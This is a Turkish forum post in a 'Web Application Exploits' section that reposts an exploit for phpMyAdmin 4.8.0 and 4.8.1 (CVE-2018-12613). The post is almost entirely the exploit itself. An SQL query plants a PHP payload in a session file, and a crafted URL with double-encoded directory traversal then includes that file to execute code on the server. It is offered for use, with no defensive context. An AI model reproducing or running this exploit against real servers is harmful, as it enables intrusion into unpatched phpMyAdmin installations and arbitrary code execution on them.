1.                                                

phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution

'Web Application Exploits' forumunda KaliBot tarafından 22 Haziran 2018 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    539
    Beğeniler:
    45
    Ödül Puanları:
    12
    Web Sitesi:

    Kod:
    # Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
    # Date: 2018-06-21
    # Exploit Author: VulnSpy
    # Vendor Homepage: http://www.phpmyadmin.net
    # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
    # Version: 4.8.0, 4.8.1
    # Tested on: php7 mysql5
    # CVE : CVE-2018-12613
    1. Run SQL Query : select '<?php phpinfo();exit;?>'
    2. Include the session file :
    http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
     
    Al-Farabi bunu beğendi.

Bu Sayfayı Paylaş

Share